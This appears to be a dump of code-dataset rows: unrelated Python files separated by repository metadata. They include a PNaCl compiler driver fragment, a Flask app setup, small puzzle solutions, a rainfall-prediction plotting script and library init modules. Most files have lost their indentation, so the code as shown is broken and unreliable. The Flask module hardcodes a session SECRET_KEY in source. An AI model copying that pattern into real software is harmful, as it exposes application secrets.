# fail-fast: if the REV file exists but regex search failed,
# we need to fix the regex to get nacl-version.
if not m:
Log.Fatal('Failed to parse REV file to get nacl-version.')
def main(argv):
env.update(EXTRA_ENV)
CheckSetup()
ParseArgs(argv, CustomPatterns + GCCPatterns)
# "configure", especially when run as part of a toolchain bootstrap
# process, will invoke gcc with various diagnostic options and
# parse the output. In these cases we do not alter the incoming
# commandline. It is also important to not emit spurious messages.
if env.getbool('DIAGNOSTIC'):
if env.getbool('SHOW_VERSION'):
code, stdout, stderr = Run(env.get('CC') + env.get('CC_FLAGS'),
redirect_stdout=subprocess.PIPE)
out = stdout.split('\n')
nacl_version = ReadDriverRevision()
out[0] += ' nacl-version=%s' % nacl_version
stdout = '\n'.join(out)
print stdout,
else:
Run(env.get('CC') + env.get('CC_FLAGS'))
return 0
unmatched = env.get('UNMATCHED')
if len(unmatched) > 0:
UnrecognizedOption(*unmatched)
# If -arch was given, we are compiling directly to native code
compiling_to_native = GetArch() is not None
if env.getbool('ALLOW_NATIVE'):
if not compiling_to_native:
Log.Fatal("--pnacl-allow-native without -arch is not meaningful.")
# For native/mixed links, also bring in the native libgcc and
# libcrt_platform to avoid link failure if pre-translated native
# code needs functions from it.
env.append('LD_FLAGS', env.eval('-L${LIBS_NATIVE_ARCH}'))
env.append('STDLIBS', '-lgcc')
env.append('STDLIBS', '-lcrt_platform')
flags_and_inputs = env.get('INPUTS')
output = env.getone('OUTPUT')
if len(flags_and_inputs) == 0:
if env.getbool('VERBOSE'):
# -v can be invoked without any inputs. Runs the original
# command without modifying the commandline for this case.
Run(env.get('CC') + env.get('CC_FLAGS'))
return 0
else:
Log.Fatal('No input files')
gcc_mode = env.getone('GCC_MODE')
output_type = DriverOutputTypes(gcc_mode, compiling_to_native)
# '-shared' modifies the output from the linker and should be considered when
# determining the final output type.
if env.getbool('SHARED'):
if compiling_to_native:
Log.Fatal('Building native shared libraries not supported')
if gcc_mode != '':
Log.Fatal('-c, -S, and -E are disallowed with -shared')
output_type = 'pll'
# INPUTS consists of actual input files and a subset of flags like -Wl,<foo>.
# Create a version with just the files.
inputs = [f for f in flags_and_inputs if not IsFlag(f)]
header_inputs = [f for f in inputs
if filetype.IsHeaderType(filetype.FileType(f))]
# Handle PCH case specially (but only for a limited sense...)
if header_inputs and gcc_mode != '-E':
# We only handle doing pre-compiled headers for all inputs or not at
# all at the moment. This is because DriverOutputTypes only assumes
# one type of output, depending on the "gcc_mode" flag. When mixing
# header inputs w/ non-header inputs, some of the outputs will be
# pch while others will be output_type. We would also need to modify
# the input->output chaining for the needs_linking case.
if len(header_inputs) != len(inputs):
Log.Fatal('mixed compiling of headers and source not supported')
CompileHeaders(header_inputs, output)
return 0
needs_linking = (gcc_mode == '')
if env.getbool('NEED_DASH_E') and gcc_mode != '-E':
Log.Fatal("-E or -x required when input is from stdin")
# There are multiple input files and no linking is being done.
# There will be multiple outputs. Handle this case separately.
if not needs_linking:
if output != '' and len(inputs) > 1:
Log.Fatal('Cannot have -o with -c, -S, or -E and multiple inputs: %s',
repr(inputs))
for f in inputs:
intype = filetype.FileType(f)
if not (filetype.IsSourceType(intype) or filetype.IsHeaderType(intype)):
if ((output_type == 'pp' and intype != 'S') or
(output_type == 'll') or
(output_type == 'po' and intype != 'll') or
(output_type == 's' and intype not in ('ll','po','S')) or
(output_type == 'o' and intype not in ('ll','po','S','s'))):
Log.Fatal("%s: Unexpected type of file for '%s'",
pathtools.touser(f), gcc_mode)
if output == '':
f_output = DefaultOutputName(f, output_type)
else:
f_output = output
namegen = TempNameGen([f], f_output)
CompileOne(f, output_type, namegen, f_output)
return 0
# Linking case
assert(needs_linking)
assert(output_type in ('pll', 'pexe', 'nexe'))
if output == '':
output = pathtools.normalize('a.out')
namegen = TempNameGen(flags_and_inputs, output)
# Compile all source files (c/c++/ll) to .po
for i in xrange(0, len(flags_and_inputs)):
if IsFlag(flags_and_inputs[i]):
continue
intype = filetype.FileType(flags_and_inputs[i])
if filetype.IsSourceType(intype) or intype == 'll':
flags_and_inputs[i] = CompileOne(flags_and_inputs[i], 'po', namegen)
# Compile all .s/.S to .o
if env.getbool('ALLOW_NATIVE'):
for i in xrange(0, len(flags_and_inputs)):
if IsFlag(flags_and_inputs[i]):
continue
intype = filetype.FileType(flags_and_inputs[i])
if intype in ('s','S'):
flags_and_inputs[i] = CompileOne(flags_and_inputs[i], 'o', namegen)
# We should only be left with .po and .o and libraries
for f in flags_and_inputs:
if IsFlag(f):
continue
intype = filetype.FileType(f)
if intype in ('o','s','S') or filetype.IsNativeArchive(f):
if not env.getbool('ALLOW_NATIVE'):
Log.Fatal('%s: Native object files not allowed in link. '
'Use --pnacl-allow-native to override.', pathtools.touser(f))
assert(intype in ('po','o','so','ldscript') or filetype.IsArchive(f))
# Fix the user-specified linker arguments
ld_inputs = []
for f in flags_and_inputs:
if f.startswith('-Xlinker='):
ld_inputs.append(f[len('-Xlinker='):])
elif f.startswith('-Wl,'):
ld_inputs += f[len('-Wl,'):].split(',')
else:
ld_inputs.append(f)
if env.getbool('ALLOW_NATIVE'):
ld_inputs.append('--pnacl-allow-native')
# Invoke the linker
env.set('ld_inputs', *ld_inputs)
ld_args = env.get('LD_ARGS')
ld_flags = env.get('LD_FLAGS')
RunDriver('pnacl-ld', ld_flags + ld_args + ['-o', output])
return 0
def IsFlag(f):
return f.startswith('-')
def CompileHeaders(header_inputs, output):
if output != '' and len(header_inputs) > 1:
Log.Fatal('Cannot have -o <out> and compile multiple header files: %s',
repr(header_inputs))
for f in header_inputs:
f_output = output if output else DefaultPCHOutputName(f)
RunCC(f, f_output, mode='', emit_llvm_flag='')
def CompileOne(infile, output_type, namegen, output = None):
if output is None:
output = namegen.TempNameForInput(infile, output_type)
chain = DriverChain(infile, output, namegen)
SetupChain(chain, filetype.FileType(infile), output_type)
chain.run()
return output
def RunCC(infile, output, mode, emit_llvm_flag='-emit-llvm'):
intype = filetype.FileType(infile)
typespec = filetype.FileTypeToGCCType(intype)
include_cxx_headers = ((env.get('LANGUAGE') == 'CXX') or
(intype in ('c++', 'c++-header')))
env.setbool('INCLUDE_CXX_HEADERS', include_cxx_headers)
if IsStdinInput(infile):
infile = '-'
RunWithEnv("${RUN_CC}", infile=infile, output=output,
emit_llvm_flag=emit_llvm_flag, mode=mode,
typespec=typespec)
def RunLLVMAS(infile, output):
if IsStdinInput(infile):
infile = '-'
# This is a bitcode only step - so get rid of "-arch xxx" which
# might be inherited from the current invocation
RunDriver('pnacl-as', [infile, '-o', output],
suppress_inherited_arch_args=True)
def RunNativeAS(infile, output):
if IsStdinInput(infile):
infile = '-'
RunDriver('pnacl-as', [infile, '-o', output])
def RunTranslate(infile, output, mode):
if not env.getbool('ALLOW_TRANSLATE'):
Log.Fatal('%s: Trying to convert bitcode to an object file before '
'bitcode linking. This is supposed to wait until '
'translation. Use --pnacl-allow-translate to override.',
pathtools.touser(infile))
args = env.get('TRANSLATE_FLAGS') + [mode, '--allow-llvm-bitcode-input',
infile, '-o', output]
if env.getbool('PIC'):
args += ['-fPIC']
RunDriver('pnacl-translate', args)
def RunOpt(infile, outfile, pass_list):
filtered_list = [pass_option for pass_option in pass_list
if pass_option not in env.get('LLVM_PASSES_TO_DISABLE')]
RunDriver('pnacl-opt', filtered_list + [infile, '-o', outfile])
def SetupChain(chain, input_type, output_type):
assert(output_type in ('pp','ll','po','s','o'))
cur_type = input_type
# source file -> pp
if filetype.IsSourceType(cur_type) and output_type == 'pp':
chain.add(RunCC, 'cpp', mode='-E')
cur_type = 'pp'
if cur_type == output_type:
return
# header file -> pre-process
if filetype.IsHeaderType(cur_type) and output_type == 'pp':
chain.add(RunCC, 'cpp', mode='-E')
cur_type = 'pp'
if cur_type == output_type:
return
# source file -> ll
if (filetype.IsSourceType(cur_type) and
(env.getbool('FORCE_INTERMEDIATE_LL') or output_type == 'll')):
chain.add(RunCC, 'll', mode='-S')
cur_type = 'll'
if cur_type == output_type:
return
# ll -> po
if cur_type == 'll':
chain.add(RunLLVMAS, 'po')
cur_type = 'po'
if cur_type == output_type:
return
# source file -> po (we also force native output to go through this phase
if filetype.IsSourceType(cur_type) and output_type in ('po', 'o', 's'):
chain.add(RunCC, 'po', mode='-c')
cur_type = 'po'
if cur_type == output_type:
return
# po -> o
if (cur_type == 'po' and output_type == 'o'):
# If we aren't using biased bitcode, then at least -expand-byval
# must be run to work with the PPAPI shim calling convention.
if IsPortable():
chain.add(RunOpt, 'expand.po', pass_list=['-expand-byval'])
chain.add(RunTranslate, 'o', mode='-c')
cur_type = 'o'
if cur_type == output_type:
return
# po -> s
if cur_type == 'po':
# If we aren't using biased bitcode, then at least -expand-byval
# must be run to work with the PPAPI shim calling convention.
if IsPortable():
chain.add(RunOpt, 'expand.po', pass_list=['-expand-byval'])
chain.add(RunTranslate, 's', mode='-S')
cur_type = 's'
if cur_type == output_type:
return
# S -> s
if cur_type == 'S':
chain.add(RunCC, 's', mode='-E')
cur_type = 's'
if output_type == 'pp':
return
if cur_type == output_type:
return
# s -> o
if cur_type == 's' and output_type == 'o':
chain.add(RunNativeAS, 'o')
cur_type = 'o'
if cur_type == output_type:
return
Log.Fatal("Unable to compile .%s to .%s", input_type, output_type)
def get_help(argv):
tool = env.getone('SCRIPT_NAME')
if '--help-full' in argv:
# To get ${CC}, etc.
env.update(EXTRA_ENV)
code, stdout, stderr = Run('"${CC}" -help',
redirect_stdout=subprocess.PIPE,
redirect_stderr=subprocess.STDOUT,
errexit=False)
return stdout
else:
return """
This is a "GCC-compatible" driver using clang under the hood.
Usage: %s [options] <inputs> ...
BASIC OPTIONS:
-o <file> Output to <file>.
-E Only run the preprocessor.
-S Generate bitcode assembly.
-c Generate bitcode object.
-I <dir> Add header search path.
-L <dir> Add library search path.
-D<key>[=<val>] Add definition for the preprocessor.
-W<id> Toggle warning <id>.
-f<feature> Enable <feature>.
-Wl,<arg> Pass <arg> to the linker.
-Xlinker <arg> Pass <arg> to the linker.
-Wt,<arg> Pass <arg> to the translator.
-Xtranslator <arg> Pass <arg> to the translator.
-Wp,<arg> Pass <arg> to the preprocessor.
-Xpreprocessor,<arg> Pass <arg> to the preprocessor.
-x <language> Treat subsequent input files as having type <language>.
-static Produce a static executable (the default).
-Bstatic Link subsequent libraries statically.
-Bdynamic Link subsequent libraries dynamically.
-fPIC Ignored (only used by translator backend)
(accepted for compatibility).
-pipe Ignored (for compatibility).
  -O<n>               Optimization level <n>: 0, 1, 2, 3, 4 or s.
-g Generate complete debug information.
-gline-tables-only Generate debug line-information only
(allowing for stack traces).
-flimit-debug-info Generate limited debug information.
-save-temps Keep intermediate compilation results.
-v Verbose output / show commands.
-h | --help Show this help.
--help-full Show underlying clang driver's help message
(warning: not all options supported).
""" % (tool)
| [
"[email protected]"
] | |
6235ff1283a1cd1df9f2920ac2d4acc0b4fda5f2 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_tubercles.py | 1fd9350940d02997c44f6017604e905edf183a0b | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#class header
class _TUBERCLES():
def __init__(self,):
self.name = "TUBERCLES"
self.definitions = tubercle
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['tubercle']
| [
"[email protected]"
] | |
d93f1eac9a51b554e79f2210ef4ec9efb9dc75e3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02785/s616461833.py | e25ba5505a0fe199b73bcb1668bb380fc510363a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | n, k = map(int, input().split())
h = list(map(int, input().split()))
print(sum(sorted(h)[::-1][k:]))  # total height remaining after removing the K largest values
"[email protected]"
] | |
23259865da4b2ba2241e13dc4a003730ecd8244e | f483545d7765c25d1b315027726dbd74bc77b98a | /myproject/helloflask/__init__.py | 3c841b6144c426d612c3be2276bab54c47abc33d | [] | no_license | niceman5/pythonProject | e51b44a50776100a63443d7da850ba4b8b00f5eb | 3589fd200b56f68b856d2b4d2031c2a1135168a0 | refs/heads/master | 2023-07-10T16:12:57.756944 | 2023-06-27T08:13:54 | 2023-06-27T08:13:54 | 135,047,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,573 | py | from flask import Flask, g, request, Response, make_response
from flask import session, render_template, Markup, url_for
from datetime import date, datetime, timedelta
import os
from helloflask.init_db import init_database, db_session
app = Flask(__name__)
import helloflask.views
import helloflask.tests
import helloflask.filters
app.debug = True
app.jinja_env.trim_blocks = True
# config["connect_args"] = {"options": "-c timezone=utc"}
def dated_url_for(endpoint, **values):
if endpoint == 'static':
filename = values.get('filename', None)
if filename:
file_path = os.path.join(app.root_path,
endpoint, filename)
values['q'] = int(os.stat(file_path).st_mtime)
return url_for(endpoint, **values)
@app.context_processor
def override_url_for():
return dict(url_for=dated_url_for)
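# Effect of the override above (illustrative; the filename is a placeholder): a template call
#   {{ url_for('static', filename='css/style.css') }}
# now renders roughly as /static/css/style.css?q=<file mtime>, so browsers re-fetch a static
# asset whenever the file on disk changes (simple cache busting).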
app.config.update(
connect_args={"options": "-c timezone=utc"},
SECRET_KEY='X1243yRH!mMwf',
SESSION_COOKIE_NAME='pyweb_flask_session',
PERMANENT_SESSION_LIFETIME=timedelta(31) # 31 days
)
@app.before_first_request
def beforeFirstRequest():
print(">> before_first_request!!")
init_database() # initialize database
@app.after_request
def afterReq(response):
print(">> after_request!!")
return response
@app.teardown_request
def teardown_request(exception):
print(">>> teardown request!!", exception)
@app.teardown_appcontext
def teardown_context(exception):
print(">>> teardown context!!", exception)
db_session.remove() # remove used db-session
| [
"[email protected]"
] | |
7e0e11a25de222a5998cf039e5d07b16e1e5ee3d | 0cfb5831a748ebd46e438e3ad7e7a09c1d196499 | /com/chapter_02/section_03/task_2.3.1_string.py | 0ced5f96b6c94cd49087d941d8d2db0b958d7a97 | [] | no_license | StevenGeGe/pythonFromIntroductionToPractice01 | 7cfe8cdb4bc5c0ddbe25b44976231d72d9e10108 | 9d2ba499056b30ded14180e6c4719ee48edd9772 | refs/heads/master | 2023-02-15T04:08:59.878711 | 2020-12-28T13:27:55 | 2020-12-28T13:27:55 | 310,980,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2020/11/8 14:44
# @Author : Yong
# @Email : [email protected]
# @File : task_2.3.1_string.py
# @Software: PyCharm
# title(): returns a copy of the string in title case, i.e. the first letter of every
# word is upper-cased and the remaining letters are lower-cased.
# Title-casing an all-lowercase string
name_big = "ada love"
print(name_big.title())  # Output: Ada Love
# Title-casing a string whose words are already capitalized
name_small = "All The World"
print(name_small.title())  # Output: All The World
| [
"[email protected]"
] | |
4592909cbecdc99a76075adfdb88ebecd628f893 | e247d9261676f257752c0c6beac161954137a81c | /src/0670.maximum-swap/maximum-swap.py | a768dba246b1ee138757c7df172f980aba66c1ea | [
"MIT"
] | permissive | henrymorgen/Just-Code | 8fbbd8288b485372a44e10b0078b5edb8af61a3b | fa03ebb89edd8f2292de7c0644dbab88dc1d924c | refs/heads/master | 2022-10-19T05:59:53.134092 | 2020-06-10T02:26:43 | 2020-06-10T02:26:43 | 273,656,532 | 1 | 2 | MIT | 2020-06-20T07:02:38 | 2020-06-20T07:02:38 | null | UTF-8 | Python | false | false | 447 | py | class Solution:
    def maximumSwap(self, num: int) -> int:
        # Greedy single swap: scan the digits from right to left, tracking the index of the
        # largest digit seen so far. Whenever a smaller digit appears to its left, remember
        # that (position, largest-digit-index) pair; the last pair recorded is the leftmost
        # improvable position, swapped with the largest digit to its right.
        num = list(str(num))
        max_idx = len(num) - 1
        xi = yi = 0
        for i in range(len(num) - 1, -1, -1):
            if num[i] > num[max_idx]:
                max_idx = i          # new largest digit so far ('>' is strict, so ties keep the rightmost)
            elif num[i] < num[max_idx]:
                xi = i               # digit to replace
                yi = max_idx         # digit to swap it with
        num[xi], num[yi] = num[yi], num[xi]
        return int("".join(num))
"[email protected]"
] | |
c288be163fc503676e07dbc33ab1ccc5193348d6 | f28591fab50d9b7a539c66b5a81fc91d1bc2ce64 | /py3/def/uint32_rotateleft.py | 3d8529dece0a6541a402dce9cfeefd84e5370f9e | [] | no_license | tnzw/tnzw.github.io | b8a5fe1f8479736bbf2b3594d511a1282939a3b3 | 6d95968db793cebcfa77cb49eecd987f821350db | refs/heads/master | 2023-04-21T14:22:49.849859 | 2023-03-31T15:55:01 | 2023-03-31T15:55:01 | 176,712,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | # uint32_rotateleft.py Version 1.0.0
# Copyright (c) 2020 Tristan Cavelier <[email protected]>
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# http://www.wtfpl.net/ for more details.
def uint32_rotateleft(uint32, n):
n %= 32
if n < 0: n += 32
return (((uint32 << n) & 0xFFFFFFFF) | (uint32 >> (32 - n)))
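
# Minimal self-check sketch with illustrative values:
if __name__ == "__main__":
    assert uint32_rotateleft(0x80000001, 1) == 0x00000003   # the high bit wraps around to bit 0
    assert uint32_rotateleft(0x00000001, 36) == 0x00000010  # n is reduced modulo 32 (36 -> 4)
    assert uint32_rotateleft(0x12345678, -4) == 0x81234567  # a negative n rotates right
    print("uint32_rotateleft: examples OK")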
| [
"[email protected]"
] | |
4c13c1b16129e4ea923b3a8845fa0d873f5515cb | 471c56d189c21733371fb60f3d4a13e69b6c8c0d | /plot_comp_prediction_clstm.py | ffb3a6bdfb0b40079d1f116578e2cd5e96cf6b3f | [] | no_license | inoue0406/svg | 2b3d50e17526d27b37e352a535a8468b23d5773b | 6a12e052ca9d9a54eaae1657e236259b00aabdc9 | refs/heads/master | 2020-08-13T12:25:41.729998 | 2019-11-03T06:31:06 | 2019-11-03T06:31:06 | 214,967,485 | 0 | 0 | null | 2019-10-14T06:43:43 | 2019-10-14T06:43:43 | null | UTF-8 | Python | false | false | 8,294 | py | #
# Plot Predicted Rainfall Data
# for non-probabilistic clstm model
#
import torch
import numpy as np
import torch.utils.data as data
from torch.autograd import Variable
from torch.utils.data import DataLoader
import argparse
import pandas as pd
import h5py
import os
import sys
import random
import itertools
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.colors import LinearSegmentedColormap
import utils
from jma_pytorch_dataset import *
from scaler import *
from colormap_JMA import Colormap_JMA
def inv_scaler(x):
"""
Back to original scale
"""
return (x ** 2.0)*201.0
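# Hedged note: inv_scaler assumes the data were scaled with a forward transform of the form
# x_scaled = sqrt(x / 201.0), with 201 mm/h as the presumed maximum rain rate, so
# inv_scaler(1.0) == 201.0 and inv_scaler(0.5) == 50.25.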
def plot_rainfall(pic_tg,pic_pred,pic_path,fname):
# input
# pic_tg: numpy array with [time,x,y] dim
    # pic_pred: numpy array with [time,x,y] dim
print('Plotting: ',fname,np.max(pic_tg),np.max(pic_pred))
# plot
cm = Colormap_JMA()
for nt in range(pic_tg.shape[0]):
fig, ax = plt.subplots(figsize=(20, 8))
fig.suptitle("Precip prediction starting at: "+fname, fontsize=30)
#
id = nt
dtstr = str((id+1)*5)
# target
plt.subplot(1,2,1)
im = plt.imshow(pic_tg[id,:,:],vmin=0,vmax=50,cmap=cm,origin='lower')
plt.title("true:"+dtstr+"min", fontsize=30)
plt.axis('off')
plt.grid()
# predicted
plt.subplot(1,2,2)
im = plt.imshow(pic_pred[id,:,:],vmin=0,vmax=50,cmap=cm,origin='lower')
plt.title("pred:"+dtstr+"min", fontsize=30)
plt.axis('off')
plt.grid()
# color bar
fig.subplots_adjust(right=0.93,top=0.85)
cbar_ax = fig.add_axes([0.94, 0.15, 0.01, 0.7])
fig.colorbar(im, cax=cbar_ax)
# save as png
nt_str = '_dt%02d' % nt
plt.savefig(pic_path+'/'+'comp_pred_'+fname+nt_str+'.png')
plt.close()
def make_gifs(x, idx, name,frame_predictor,encoder,decoder):
all_gen = []
frame_predictor.hidden = frame_predictor.init_hidden()
x_in = x[0]
all_gen.append(x_in)
for i in range(1, opt.n_eval):
# h = encoder(x_in)
# if opt.last_frame_skip or i < opt.n_past:
# h, skip = h
# else:
# h, _ = h
# h = h.detach()
# if i < opt.n_past:
# h_target = encoder(x[i])[0].detach()
# frame_predictor(h)
# x_in = x[i]
# all_gen.append(x_in)
# else:
# h = frame_predictor(h.detach())
# x_in = decoder([h, skip]).detach()
# all_gen.append(x_in)
if i < opt.n_past:
x_in = x[i-1] # use ground truth frame for the first half
h, skip = encoder(x_in)
h = h.detach()
else:
x_in = x_pred # use predicted frame for the second half (NOT use ground truth)
_, skip = encoder(x_in)
h = h_pred
h_pred = frame_predictor(h).detach()
x_pred = decoder([h_pred, skip]).detach()
all_gen.append(x_pred)
# prep np.array to be plotted
TRU = np.zeros([opt.n_eval, opt.batch_size, 1, opt.image_width, opt.image_width])
GEN = np.zeros([opt.n_eval, opt.batch_size, 1, opt.image_width, opt.image_width])
for i in range(opt.n_eval):
TRU[i,:,:,:,:] = inv_scaler(x[i].cpu().numpy())
GEN[i,:,:,:,:] = inv_scaler(all_gen[i].cpu().numpy())
# plot
print(" ground truth max:",np.max(TRU)," gen max:",np.max(GEN))
for j in range(opt.batch_size):
plot_rainfall(TRU[:,j,0,:,:],GEN[:,j,0,:,:],opt.log_dir,name+"_sample"+str(j))
# plot comparison of predicted vs ground truth
def plot_comp_prediction(opt,df_sampled,mode='png_ind'):
print("Random Seed: ", opt.seed)
random.seed(opt.seed)
torch.manual_seed(opt.seed)
torch.cuda.manual_seed_all(opt.seed)
dtype = torch.cuda.FloatTensor
# ---------------- load the models ----------------
tmp = torch.load(opt.model_path)
frame_predictor = tmp['frame_predictor']
frame_predictor.eval()
encoder = tmp['encoder']
decoder = tmp['decoder']
encoder.train()
decoder.train()
frame_predictor.batch_size = opt.batch_size
opt.g_dim = tmp['opt'].g_dim
opt.num_digits = tmp['opt'].num_digits
# --------- transfer to gpu ------------------------------------
frame_predictor.cuda()
encoder.cuda()
decoder.cuda()
# ---------------- set the options ----------------
opt.dataset = tmp['opt'].dataset
opt.last_frame_skip = tmp['opt'].last_frame_skip
opt.channels = tmp['opt'].channels
opt.image_width = tmp['opt'].image_width
print(opt)
# --------- load a dataset ------------------------------------
# loading datasets
train_dataset = JMARadarDataset(root_dir=opt.data_root,
csv_file=opt.train_path,
tdim_use=opt.n_past,
transform=None)
valid_dataset = JMARadarDataset(root_dir=opt.data_root,
csv_file=opt.valid_path,
tdim_use=opt.n_past,
transform=None)
train_loader = DataLoader(dataset=train_dataset,
num_workers=opt.data_threads,
batch_size=opt.batch_size,
shuffle=True,
drop_last=True,
pin_memory=True)
test_loader = DataLoader(dataset=valid_dataset,
num_workers=opt.data_threads,
batch_size=opt.batch_size,
shuffle=False,
drop_last=True,
pin_memory=True)
def get_training_batch():
while True:
for sequence in train_loader:
batch = utils.normalize_data(opt, dtype, sequence)
yield batch
training_batch_generator = get_training_batch()
def get_testing_batch():
while True:
for sequence in test_loader:
batch = utils.normalize_data(opt, dtype, sequence)
yield batch
testing_batch_generator = get_testing_batch()
for i in range(0, opt.N, opt.batch_size):
print(i)
# plot train
train_x = next(training_batch_generator)
make_gifs(train_x, i, 'train',frame_predictor,encoder,decoder)
# plot test
test_x = next(testing_batch_generator)
make_gifs(test_x, i, 'test',frame_predictor,encoder,decoder)
break
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', default=100, type=int, help='batch size')
parser.add_argument('--data_root', default='data', help='root directory for data')
parser.add_argument('--train_path', default='', help='csv file containing filenames for training')
parser.add_argument('--valid_path', default='', help='csv file containing filenames for validation')
parser.add_argument('--model_path', default='', help='path to model')
parser.add_argument('--log_dir', default='', help='directory to save generations to')
parser.add_argument('--seed', default=1, type=int, help='manual seed')
parser.add_argument('--n_past', type=int, default=2, help='number of frames to condition on')
parser.add_argument('--n_future', type=int, default=28, help='number of frames to predict')
parser.add_argument('--num_threads', type=int, default=0, help='number of data loading threads')
parser.add_argument('--N', type=int, default=256, help='number of samples')
parser.add_argument('--data_threads', type=int, default=5, help='number of data loading threads')
opt = parser.parse_args()
os.makedirs('%s' % opt.log_dir, exist_ok=True)
opt.n_eval = opt.n_past+opt.n_future
opt.max_step = opt.n_eval
# samples to be plotted
sample_path = '../datasets/jma/sampled_forplot_3day_JMARadar.csv'
# read sampled data in csv
df_sampled = pd.read_csv(sample_path)
print('samples to be plotted')
print(df_sampled)
plot_comp_prediction(opt,df_sampled,mode='png_ind')
| [
"[email protected]"
] | |
5cbbcad90b7a18247ef4129e11896b12752543ab | ec827bd5df431c9400946e8d0593448814b5534b | /venv/bin/ipython | 498f13bc79c779676e375d1d51d86e95af3fa922 | [] | no_license | grantnicholas/pytone | 7acd70878de8090d06d7a2911a67b3dbb3b64256 | b89c688cc88588a3758fff288bc9b1364534b42e | refs/heads/master | 2021-01-23T06:19:47.203418 | 2014-09-21T21:52:27 | 2014-09-21T21:52:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | #!/home/grant/Desktop/pytone/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from IPython import start_ipython
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(start_ipython())
| [
"[email protected]"
] | ||
56b5cf1eaba651687a7c590fa1649daae00ec525 | 1b0755fafd5993c8fe5c847d0f3b250f0705cc87 | /perf/__init__.py | ccef7a523ee945da1eb514e9d7dade75768eb8dd | [
"MIT"
] | permissive | pombredanne/perf | 65b722b2822daf598798da40917abdc608708ec3 | da5f2259815c39569957f584a7e1e57cfdbbb927 | refs/heads/master | 2021-04-29T11:31:23.533547 | 2016-12-16T14:50:02 | 2016-12-16T14:50:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 913 | py | from __future__ import division, print_function, absolute_import
__version__ = '0.9.2'
# Clocks
try:
# Python 3.3+ (PEP 418)
from time import monotonic as monotonic_clock, perf_counter
except ImportError:
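    # Python < 3.3 fallback: time.clock is the best counter on Windows, time.time elsewhere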
import sys
import time
monotonic_clock = time.time
if sys.platform == "win32":
perf_counter = time.clock
else:
perf_counter = time.time
del sys, time
__all__ = ['monotonic_clock', 'perf_counter']
from perf._utils import is_significant, python_implementation, python_has_jit # noqa
__all__.extend(('is_significant', 'python_implementation', 'python_has_jit'))
from perf._metadata import format_metadata # noqa
__all__.append('format_metadata')
from perf._bench import Run, Benchmark, BenchmarkSuite, add_runs # noqa
__all__.extend(('Run', 'Benchmark', 'BenchmarkSuite', 'add_runs'))
from perf._runner import Runner # noqa
__all__.append('Runner')
| [
"[email protected]"
] | |
18038f0af6c237d5b9db5678328e4d466f172dc2 | 57fec0f5928beaaeb2dc66004267204e77bf05a7 | /scripts/05-gmaps-test.py | ca95867cc5fec1d0fc87836f9afd89caf7c679cc | [] | no_license | fgolemo/neo-m8p-python | a26d382cd0a8d90bd8eca4a6a2c13a51bc1a08b9 | f9af936cdc804b24a76b697df749b0aca0325bed | refs/heads/master | 2020-06-21T09:55:13.280892 | 2019-07-25T17:36:07 | 2019-07-25T17:36:07 | 197,414,904 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | import cv2
from neom8p.gmaps import get_gmap
map = get_gmap(45.530807,-73.613293, 19)
cv2.imshow("map", map)
cv2.waitKey(1)
print ("yo") | [
"[email protected]"
] | |
41ebec25755d59ff6b7c39a02ee7b633ecb9eb93 | 24223ef61937be40f0ea23db279a93b75a0b7a0f | /pygogo/utils.py | e1c94efb0cea6c5c6bfdab9424b8a04a82d3f199 | [
"MIT"
] | permissive | liutaihua/pygogo | cfd13a036bcbdf7767fa05e31ab2161be9c6a99b | 7b7a99fdf28cef3185cf7f3f8f0cad8b8d5691b2 | refs/heads/master | 2021-01-18T01:48:15.294501 | 2016-01-01T10:58:27 | 2016-01-01T10:58:27 | 48,997,690 | 1 | 0 | null | 2016-01-04T13:08:29 | 2016-01-04T13:08:29 | null | UTF-8 | Python | false | false | 8,266 | py | # -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""
pygogo.utils
~~~~~~~~~~~~
Misc classes and functions that don't warrant their own module
Examples:
basic usage::
>>> CustomEncoder().encode(range(5))
'[0, 1, 2, 3, 4]'
"""
from __future__ import (
absolute_import, division, print_function, with_statement,
unicode_literals)
import logging
import sys
from json import JSONEncoder
from builtins import *
module_hdlr = logging.StreamHandler(sys.stdout)
module_logger = logging.getLogger(__name__)
module_logger.addHandler(module_hdlr)
class CustomEncoder(JSONEncoder):
"""A unicode aware JSON encoder that can handle iterators, dates, and times
Examples:
>>> CustomEncoder().encode(range(5))
'[0, 1, 2, 3, 4]'
>>> from json import dumps
>>> dumps(range(5), cls=CustomEncoder)
'[0, 1, 2, 3, 4]'
"""
def default(self, obj):
""" Encodes a given object
Args:
obj (scalar): The object to encode.
Returns:
The encoded object
Examples:
>>> CustomEncoder().default(range(5))
[0, 1, 2, 3, 4]
"""
if hasattr(obj, 'real'):
encoded = float(obj)
